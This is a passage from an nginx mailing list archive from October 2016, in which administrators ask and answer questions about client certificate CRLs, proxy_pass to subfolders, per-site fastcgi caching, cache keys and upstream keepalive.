nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From zeal at freecharge.com Fri Oct 14 10:02:05 2016 From: zeal at freecharge.com (Zeal Vora) Date: Fri, 14 Oct 2016 15:32:05 +0530 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: <20161013125732.GR73038@mdounin.ru> Message-ID: Oh. We have just one root CA and I downloaded the CRL file for that CA and used it in nginx. The depth is also 1. As soon as I put crl config in nginx, all request leads to HTTP 400 Bad Request . On Fri, Oct 14, 2016 at 2:20 PM, Alex Samad wrote: > What I had to do was sent the depth to the number or greater than the > number of ca's and I had to get all the crl's for each CA and concat > into a crl file. > > > > On 14 October 2016 at 16:49, Zeal Vora wrote: > > Thanks Maxim. > > > > I tried changing the ssl_verify_depth to 1 from value of 2 however still > I > > get 400 Bad Request for all the certificates ( Valid and Revoked ). > > > > I checked the error_log file, there are no entries in that file. It all > > works when I remove the ssl_crl option ( however then revoked > certificates > > are allowed ). > > > > Just for bit more info, I downloaded the CRL from ADCS which is in form > of > > test.crl which I convert it to .pem format with openssl. > > > > > > > > > > On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin > wrote: > >> > >> Hello! > >> > >> On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > >> > >> > Hi > >> > > >> > We've implemented basic Certificate Based Authentication for Nginx. 
> >> > > >> > However whenever the certificate is revoked, Nginx still allows the > >> > client > >> > ( with revoked certificate ) to access the website. > >> > > >> > I verified manually with openssl with OCSP URI and OCSP seems to be > >> > working > >> > properly. Nginx doesn't seem to be forwarding request to OCSP before > >> > allowing client. > >> > >> That's because nginx doesn't support OCSP validation of client > >> certificates. Use CRLs instead. > >> > >> > I tried to specify the ssl_crl but as soon as I put it, all the > clients > >> > starts to receive 400 Bad Request. > >> > > >> > Here is my sample relevant Nginx Config :- > >> > > >> > > >> > ### SSL cert files ### > >> > > >> > ssl_client_certificate /test/ca.crt; > >> > ssl_verify_client optional; > >> > > >> > ssl_crl /prod-adcs/latest.pem; > >> > ssl_verify_depth 2; > >> > > >> > > >> > Is there something that I'm missing here ? > >> > >> Your error log should have details. Given you are using verify > >> depth set to 2, most likely there is no CRL for the root > >> certificate itself, and that's why nginx complaining. > >> > >> -- > >> Maxim Dounin > >> http://nginx.org/ > >> > >> _______________________________________________ > >> nginx mailing list > >> nginx at nginx.org > >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL:

From nginx-forum at forum.nginx.org Fri Oct 14 10:53:48 2016
From: nginx-forum at forum.nginx.org (avk)
Date: Fri, 14 Oct 2016 06:53:48 -0400
Subject: proxy_pass for subfolders
Message-ID: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org>

Hi! Can you help? How use proxy_pass (or other methods) for proxy subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app Thx!

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270269#msg-270269

From black.fledermaus at arcor.de Fri Oct 14 11:51:09 2016
From: black.fledermaus at arcor.de (basti)
Date: Fri, 14 Oct 2016 13:51:09 +0200
Subject: proxy_pass for subfolders
In-Reply-To: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org>
References: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de>

Hello, try something like

location /folder1/ {
    rewrite /folder1/(.*)$ /app/$1 break;
    proxy_pass http://site2.ltd;
    proxy_redirect off;
    # this is only for logging on site2, to see the ip of the user and not the ip of the proxy server
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_max_temp_file_size 0;
}

Best Regards, Basti

P.S. I use this to proxy a WordPress site

On 14.10.2016 12:53, avk wrote: > Hi! Can you help? How use proxy_pass (or other methods) for proxy > subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app > Thx!
> > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270269#msg-270269 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx >

From nginx-forum at forum.nginx.org Fri Oct 14 14:28:41 2016
From: nginx-forum at forum.nginx.org (avk)
Date: Fri, 14 Oct 2016 10:28:41 -0400
Subject: proxy_pass for subfolders
In-Reply-To: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de>
References: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de>
Message-ID: <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org>

Thank you for the reply, but it is not working.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270278#msg-270278

From francis at daoine.org Fri Oct 14 14:56:55 2016
From: francis at daoine.org (Francis Daly)
Date: Fri, 14 Oct 2016 15:56:55 +0100
Subject: proxy_pass for subfolders
In-Reply-To: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org>
References: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20161014145655.GG11677@daoine.org>

On Fri, Oct 14, 2016 at 06:53:48AM -0400, avk wrote: Hi there, > Hi! Can you help? How use proxy_pass (or other methods) for proxy > subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app

http://nginx.org/r/proxy_pass

Possibly the first bullet point after "A request URI is passed to the server as follows:" is relevant?

Cheers, f -- Francis Daly francis at daoine.org

From nginx-forum at forum.nginx.org Fri Oct 14 16:11:47 2016
From: nginx-forum at forum.nginx.org (mrast)
Date: Fri, 14 Oct 2016 12:11:47 -0400
Subject: Fastcgi_cache only caching 1 website
Message-ID: <2ca03652d7d5fa430e1dd04c981255a5.NginxMailingListEnglish@forum.nginx.org>

Hi, I'm relatively new to the Linux world but am learning bloody quick (you have to, it's unforgiving! :) ) I am setting up a new web server and I'm nearly ready to go live, but can't iron out one last issue - I have multiple WordPress websites set up. Each WordPress website has its own install and installation directory and a separate database. I have configured nginx with the fastcgi_cache module and it works - but only for the very first website I set up on the server. Every subsequent website gets nothing cached.
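To make the shape I'm aiming for clear, here is a minimal two-site sketch - the paths, zone names and domains here are placeholders rather than my real setup, and my real configs follow further down:

# in the http{} context: one cache path and one uniquely named keys_zone per site
fastcgi_cache_key "$scheme$request_method$host$request_uri";
fastcgi_cache_path /var/cache/nginx/site1 levels=1:2 keys_zone=site1:100m inactive=60m;
fastcgi_cache_path /var/cache/nginx/site2 levels=1:2 keys_zone=site2:100m inactive=60m;

server {
    server_name site1.example;
    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
        fastcgi_cache site1;          # each server block selects its own zone
        fastcgi_cache_valid 200 60m;
    }
}

server {
    server_name site2.example;
    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
        fastcgi_cache site2;
        fastcgi_cache_valid 200 60m;
    }
}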
Running nginx/php7 on Ubuntu Server 16.04 Here is my nginx/nginx.conf file user www-data; worker_processes 1; worker_rlimit_nofile 100000; pid /run/nginx.pid; events { worker_connections 1024; multi_accept on; } http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 15; types_hash_max_size 2048; server_tokens off; reset_timedout_connection on; # add_header X-Powered-By "EasyEngine"; add_header rt-Fastcgi-Cache $upstream_cache_status; # Limit Request limit_req_status 403; limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s; # Proxy Settings # set_real_ip_from proxy-server-ip; # real_ip_header X-Forwarded-For; fastcgi_read_timeout 300; client_max_body_size 100m; ## # SSL Settings ## ssl_session_cache shared:SSL:20m; ssl_session_timeout 10m; ssl_prefer_server_ciphers on; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-ECDSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ## # Basic Settings ## # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; # Log format Settings log_format rt_cache '$remote_addr $upstream_response_time $upstream_cache_status [$time_local] ' '$http_host "$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent"'; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_comp_level 2; gzip_buffers 16 8k; gzip_http_version 1.1; gzip_types application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/svg+xml image/x-icon text/css text/plain text/x-component text/xml text/javascript; ## # Cache Settings ## add_header Fastcgi-Cache $upstream_cache_status; fastcgi_cache_key "$scheme$request_method$host$request_uri"; fastcgi_cache_use_stale error timeout invalid_header http_500; fastcgi_ignore_headers Cache-Control Expires Set-Cookie; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 80 default_server; server_name _; return 444; } } Here is the cache working websites config fastcgi_cache_path /var/www/html/1stwebsite.com/cache levels=1:2 keys_zone=1stwebsite.com:100m inactive=60m; server { server_name 1stwebsite.com www.1stwebsite.com; access_log /var/www/html/1stwebsite.com/logs/access.log; error_log /var/www/html/1stwebsite.com/logs/error.log; root /var/www/html/1stwebsite.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* 
"/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache 1stwebsite.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge 1stwebsite.com "$scheme$request_method$host$1"; } } Here is 1 of the non working cache websites config fastcgi_cache_path /var/www/html/2ndwebiste.co.uk/cache levels=1:2 keys_zone=2ndwebiste.co.uk:100m inactive=60m; server { server_name 2ndwebiste.co.uk www.2ndwebiste.co.uk; access_log /var/www/html/2ndwebiste.co.uk/logs/access.log; error_log /var/www/html/2ndwebiste.co.uk/logs/error.log; root /var/www/html/2ndwebiste.co.uk/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache 2ndwebiste.co.uk; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge 2ndwebiste.co.uk "$scheme$request_method$host$1"; } } I think its to do with the very top line of both config files? fastcgi_cache_path /var/www/html/2ndwebiste.co.uk/cache levels=1:2 keys_zone=2ndwebiste.co.uk:100m inactive=60m; Does this need to be in the main nginx.conf file and not in each individual website config? If so - am i not meant to have a cache folder for each individual website, should there just be 1 central cache folder for all websites? I thought the "keys_zone" directive needs to be individual for each website, and thus created a seperate cache location for each website hosted. Thanks to anybody that can walk with me over the finishing line Regards Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270284,270284#msg-270284 From black.fledermaus at arcor.de Fri Oct 14 17:31:24 2016 From: black.fledermaus at arcor.de (basti) Date: Fri, 14 Oct 2016 19:31:24 +0200 Subject: proxy_pass for subfolders In-Reply-To: <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org> References: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de> <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de> Sorry, not working is not an error message, so nobody can help you. Perhaps you *should* edit this example? What have you try? 
What is the error? What's in the access-/errorlog (srv1 and srv2)? On 14.10.2016 16:28, avk wrote: > Thank you for reply, but not working. > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270278#msg-270278 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Sat Oct 15 08:22:04 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 15 Oct 2016 09:22:04 +0100 Subject: Multiple proxy_cache_path location In-Reply-To: References: Message-ID: <20161015082204.GH11677@daoine.org> On Thu, Oct 13, 2016 at 05:40:21AM -0400, lancee83 wrote: Hi there, > I'm using nginx with Unified Streaming - I would like to have different > cache settings per channel. Is it possible to state different > proxy_cache_path parameters? I think that you can have multiple proxy_cache_path directives with different parameters, each with their own path and zone. And then you can use a proxy_cache with a different zone, in different locations. So for different parameters per channel, you want different location{}s per channel. f -- Francis Daly francis at daoine.org From JEDC at ramboll.com Sat Oct 15 12:18:11 2016 From: JEDC at ramboll.com (Jens Dueholm Christensen) Date: Sat, 15 Oct 2016 12:18:11 +0000 Subject: Static or dynamic content In-Reply-To: <20160930105450.GG11677@daoine.org> References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> Message-ID: On Friday, September 30, 2016 12:55 AM Francis Daly wrote, >> No, I have an "error_page 503" and a similar one for 404 that points to two named locations, but that's it. > That might matter. > I can now get a 503, 404, or 405 result from nginx, when upstream sends a 503. [...] > Now make /tmp/x exist, and /tmp/y not exist. > > A GET request for /x is proxied, gets a 503, and returns the content of /tmp/x with a 503 status. > > A GET request for /y is proxied, gets a 503, and returns a 404 status. > > A POST request for /x is proxied, gets a 503, and returns a 405 status. > > A POST request for /y is proxied, gets a 503, and returns a 404 status. > > Since you also have an error_page for 404, perhaps that does something that leads to the output that you see. > > I suspect that when you show your error_page config and the relevant > locations, it may become clearer what you want to end up with. My local test config looks like this (log specifications and other stuff left out): server { listen 80; server_name localhost; location / { root html; try_files /offline.html @xact; add_header Cache-Control "no-cache, max-age=0, no-store, must-revalidate"; } location @xact { proxy_pass http://127.0.0.1:4431; proxy_redirect default; proxy_read_timeout 2s; proxy_send_timeout 2s; proxy_connect_timeout 2s; proxy_intercept_errors on; } error_page 404 @error_404; error_page 503 @error_503; location @error_404 { root error; rewrite (logo.png)$ /$1 break; rewrite ^(.*)$ /error404.html break; } location @error_503 { root error; rewrite (logo.png)$ /$1 break; rewrite ^(.*)$ /error503.html break; } > A test system which talks to a local HAProxy which has no "up" backends > would probably be quicker to build. Yes, thats what I had listening on 127.0.0.1:4431, and it did give me the same behaviour as I'm seeing in our production environment. I got the following captures via pcap and wireshark: Conditions are: HAProxy has a backend with no available servers, so every request results in a 503 to upstream client (nginx). 
A POST request to some resource from a browser: POST /2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Cookie: new-feature=1; Language_In_Use= Connection: keep-alive This makes nginx send this request to HAProxy: POST /2 HTTP/1.0 Host: 127.0.0.1:4431 Connection: close Content-Length: 0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded Cookie: new-feature=1; Language_In_Use= HAProxy returns this: HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

No server is available to handle this request. HAProxy also logs this (raw syslog packet): <134>Oct 15 13:17:33 jedc-local haproxy[10104]: 127.0.0.1:64746 [15/Oct/2016:13:17:33.800] xact_in-DK xact_admin/ 0/-1/-1/-1/0 503 212 - - SC-- 0/0/0/0/0 0/0 "POST /2 HTTP/1.0" This makes nginx return this back to the browser: HTTP/1.1 405 Not Allowed Server: nginx/1.8.0 Date: Sat, 15 Oct 2016 11:17:33 GMT Content-Type: text/html Content-Length: 172 Connection: keep-alive nginx also logs this: localhost 127.0.0.1 "-" [15/Oct/2016:13:17:33 +0200] "POST /2 HTTP/1.1" 405 172 503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" http "-" "-" "-" "-" -/- There is no mention of the error_page 503 location or any of the resources they specify (logo.png or error503.html) in any of nginx' logs, so I assume that they are not really connected to the problems I see. Any ideas? Regards, Jens Dueholm Christensen -------------- next part -------------- An HTML attachment was scrubbed... URL: From emailgrant at gmail.com Sat Oct 15 12:20:42 2016 From: emailgrant at gmail.com (Grant) Date: Sat, 15 Oct 2016 05:20:42 -0700 Subject: keepalive upstream In-Reply-To: References: Message-ID: > I've been struggling with a very difficult to diagnose problem when > using apache2 and Odoo in a reverse proxy configuration with nginx. > Enabling keepalive for upstream in nginx seems to have fixed it. Why > is it not enabled upstream by default as it is downstream? Does anyone know why this isn't a default? - Grant From me at myconan.net Sun Oct 16 08:01:36 2016 From: me at myconan.net (Edho Arief) Date: Sun, 16 Oct 2016 17:01:36 +0900 Subject: Index fallback? In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <1476604896.1747068.757323793.19F5A248@webmail.messagingengine.com> Hi, Just updating myself, I realized I don't even need any weird setup, just change the fallback location from location @something { } into location = /.something { } and set index parameter to index index.html /.something; It works because the last element of the list can be an absolute path as mentioned in documentation. On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > I somehow can't make this scenario work: > > root structure: > /a/index.html > /b/ <-- no index.html > > accessing: > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > Using > > try_files $uri $uri/index.html @fallback; > > doesn't work quite well because #1 becomes this instead: > > 1. site.com/a -> show /a/index.html > > and breaks relative path javascript/css files (because it's `/a` in > browser, not `/a/`). > > And using > > try_files $uri @fallback; > > Just always show @fallback for both scenarios. > > Whereas > > try_files $uri $uri/ @fallback; > > Always return 403 for #2 because the directory exists and there's no > index. > > As a side note, > > error_page 404 = @fallback; > > Wouldn't work because as mentioned in the previous one, it returns 403 > for #2 (directory exists, no index), not 404. > > Is there any way to do it without specifying separate location for each > of them? 
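In config form, the working arrangement described above is roughly this (the /.fallback name, the root and the return body are examples, not the exact setup):

server {
    root /var/www/site;
    # the last element of "index" may be an absolute path, so a
    # directory that has no index.html falls through to /.fallback
    index index.html /.fallback;

    location / {
        # nothing special needed here
    }

    location = /.fallback {
        # whatever the old @fallback location did goes here
        return 200 "fallback content\n";
    }
}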
From francis at daoine.org Sun Oct 16 08:33:43 2016
From: francis at daoine.org (Francis Daly)
Date: Sun, 16 Oct 2016 09:33:43 +0100
Subject: keepalive upstream
In-Reply-To: References: Message-ID: <20161016083343.GI11677@daoine.org>

On Sat, Oct 15, 2016 at 05:20:42AM -0700, Grant wrote: Hi there, > > I've been struggling with a very difficult to diagnose problem when > > using apache2 and Odoo in a reverse proxy configuration with nginx. > > Enabling keepalive for upstream in nginx seems to have fixed it. Why > > is it not enabled upstream by default as it is downstream? > > Does anyone know why this isn't a default?

My guess? Historical reasons and consistency.

proxy_pass from nginx to upstream was HTTP/1.0, which by default assumes "Connection: close" unless the client explicitly says otherwise. And (without checking) I guess that nginx was explicit about "close". Then the option of proxy_http_version came about, which would allow you to take advantage of some extra features if you know that your upstream uses them. Arguably, "proxy_http_version 1.1" should imply "Connection: keep-alive" if not explicitly overridden, but (again, my guess) it was cleaner and simpler to make the minimum changes when adding support for the new client http version, and the upstream server must be able to handle "Connection: close". If you want close, keep-alive, upgrade, or something else, you can add it yourself. nginx has to pick one to use if none is specified, and it looks like it picked the one that was already its default. Principle of Least Surprise, for current users.

On the "downstream" side, nginx is a http/1.1 (or 2) server. If the client connects using http/1.0, nginx will respond with "Connection: close" unless the client said otherwise. If the client connects using http/1.1, nginx will respond with "Connection: keep-alive" unless the client said otherwise. Those are the http server-side rules.

Also, I guess that nginx generally assumes that the things that it talks to are correct. I'm not sure, but it sounds like you are reporting that some combination of things that is your upstream was receiving whatever http request nginx was making, and was responding in a way that nginx was not expecting. If some part of that sequence was breaking the http request/response rules, it would be good to know so that it could be fixed in the right place. Naively, it sounds like your upstream was taking the nginx "Connection: close" part of the request and ignoring it. If that is the case, your upstream is wrong and should be fixed, independent of whatever nginx does.

f -- Francis Daly francis at daoine.org

From nginx-forum at forum.nginx.org Mon Oct 17 13:50:15 2016
From: nginx-forum at forum.nginx.org (CarstenK.)
Date: Mon, 17 Oct 2016 09:50:15 -0400
Subject: Problem with cache key
Message-ID: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org>

Hello, I have a problem. If I send a request to URL A with Chrome and another request with curl or Firefox, I get a cache miss. If I send a request to the same URL with curl on two different machines, the answer is a cache hit; that's fine. But I don't know why I get a cache miss if I test with Chrome/Firefox, Chrome/curl or Firefox/curl on the second request.

curl -I http://meinedomain/test.html

I think it is a problem with the cache key but I can't find the reason. As a first step I only consider the URL with arguments, no cookie or anything else. In a further step I want to consider a special cookie.
Version: nginx version: nginx/1.11.3 (nginx-plus-r10) (30 days trial)

Here is my configuration:

### proxy.conf
proxy_cache_path /srv/nginx/cache/test levels=1:2 keys_zone=test_cache:128m inactive=120d max_size=25G;
map $request_method $purge_method { PURGE 1; default 0; }
server {
    listen 80;
    server_name ;
    access_log /var/log/nginx/fliesenrabatte.access.log shop;
    error_log /var/log/nginx/fliesenrabatte.error.log;
    proxy_cache fliesenrabatte_cache;
    rewrite_log on;
    proxy_set_header Host ;
    proxy_cache_key $request_uri;
    # Disable caching
    # NoCache URLs
    if ($request_uri ~* "(/admin.*|/brand.*|/user.*|/login.*)") { set $no_cache 1; }
    proxy_no_cache $no_cache;
    # Home page
    location ~ /$ { proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; }
    # Cache
    location ~* \.(html|gif|jpg|png|js|css|pdf|woff|woff2|otf|ttf|eot|svg)$ { proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; }
    # Do not cache (shopping cart etc.)
    location ~* \.(cfc|cfm|htm)$ { proxy_cache off; proxy_pass http://meinupstream; }
    # Needed for wildcard purging, since the string ends in a wildcard
    location / { allow 1.1.1.1; deny all; proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; }
}

### site-conf
server_tokens off;
proxy_ignore_headers X-Accel-Expires Expires Cache-Control;
proxy_cache_valid 200 120d;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
add_header X-Cache-Status $upstream_cache_status;
upstream meinupstream { server meinedomain.de:80; }

I hope someone can help me. Sorry for my bad English :( Best, Carsten

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270324,270324#msg-270324

From nginx-forum at forum.nginx.org Mon Oct 17 14:24:45 2016
From: nginx-forum at forum.nginx.org (avk)
Date: Mon, 17 Oct 2016 10:24:45 -0400
Subject: proxy_pass for subfolders
In-Reply-To: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de>
References: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de>
Message-ID:

From the proxy server: 2016/10/17 14:19:38 [error] 6735#6735: *236 open() "/var/lib/nginx/html/000001" failed (2: No such file or directory), client:ip, server: localhost, request: "GET /000001 HTTP/1.1"

From srv1 & srv2: - [17/Oct/2016:14:16:47 +0000] "GET /123456 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"

nginx (proxy) conf: location /123456/ { rewrite /123456/(.*)$ /$1 break; proxy_pass http://SRV1/; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_max_temp_file_size 0;

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270330#msg-270330

From matthewceroni at gmail.com Mon Oct 17 21:44:00 2016
From: matthewceroni at gmail.com (Matthew Ceroni)
Date: Mon, 17 Oct 2016 14:44:00 -0700
Subject: NGINX Open Source TCP Load Balancing - service discovery
Message-ID:

https://www.nginx.com/blog/dns-service-discovery-nginx-plus/

Testing out the options provided in the above link. Specifically the "Setting the Domain Name in a Variable". The example given is L7 load balancing. I have a need for L4 using upstream, yet I am not able to get this method to work (if it even does). The Note seems to indicate that it does by stating that this method is available in 1.11.3 of the Open source version.
The issue is around where to set the variable. I have tried setting it in the upstream block but that errors saying set is not valid in this context. Tried setting it in the stream context, same error. I have also tried this on both Plus and open source and get the same errors on both. Any insight would be helpful. Thanks config: # TCP/UDP proxy and load balancing block # stream { proxy_protocol on; resolver 10.6.0.10 valid=10s; # Example configuration for TCP load balancing upstream stream_backend { zone tcp_servers 64k; server backend_servers:25 max_fails=3; } server { listen 25; status_zone tcp_server; proxy_pass stream_backend; } } So basically I need to replace server backend_servers with server $backend_servers but need to set that variable somewhere. -------------- next part -------------- An HTML attachment was scrubbed... URL: From zhanght1 at lenovo.com Tue Oct 18 02:50:57 2016 From: zhanght1 at lenovo.com (Felix HT1 Zhang) Date: Tue, 18 Oct 2016 02:50:57 +0000 Subject: Error when download the big file of 2MB Message-ID: <3B8195E42ECF3D4DA1072EF35B4F39F80138255BCA@CNMAILEX01.lenovo.com> Dears, We could download the 20MB file from web in internal APP,but it is failed when used nginx. Here is the error info:the server responsed with a status of 504(Gateway Time-out). How could I fix this problem? BR Felix zhang -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Oct 18 06:28:27 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 07:28:27 +0100 Subject: Static or dynamic content In-Reply-To: References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> Message-ID: <20161018062827.GJ11677@daoine.org> On Sat, Oct 15, 2016 at 12:18:11PM +0000, Jens Dueholm Christensen wrote: > On Friday, September 30, 2016 12:55 AM Francis Daly wrote, Hi there, > > I suspect that when you show your error_page config and the relevant > > locations, it may become clearer what you want to end up with. > > My local test config looks like this (log specifications and other stuff left out): > location / { > root html; > try_files /offline.html @xact; > } > location @xact { > proxy_pass http://127.0.0.1:4431; > proxy_intercept_errors on; > } > error_page 503 @error_503; > location @error_503 { > root error; > rewrite (logo.png)$ /$1 break; > rewrite ^(.*)$ /error503.html break; > } So: a POST for /x will be handled in @xact, which will return 503, which will be handled in @error_503, which will be rewritten to a POST for /error503.html which will be sent to the file error/error503.html, which will return a 405. Is that what you see? Two sets of questions remain: what output do 